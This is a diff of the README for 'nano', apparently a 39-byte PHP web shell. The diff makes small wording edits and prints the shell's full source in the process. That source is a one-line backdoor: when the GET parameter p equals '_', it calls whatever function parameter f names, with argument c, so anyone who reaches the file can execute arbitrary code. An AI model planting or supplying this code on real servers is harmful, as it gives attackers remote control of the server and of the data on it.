s0md3v/nano/README.md

 - Fully flexible & efficient if you know stuff

 ## Functioning
-nano consists of 39 characters and hence is 39 bytes in size.\
-Source Code:
 ```php
 <?$x=$_GET;($x[p]=='_'?$x[f]($x[c]):y);
 ```
-Yeah I know that looks kind of puzzling but let me explaining it.
+Yep, that's the source code and I know that looks kind of puzzling but let me explain it.

 - `<?` a valid replacement for `<?php`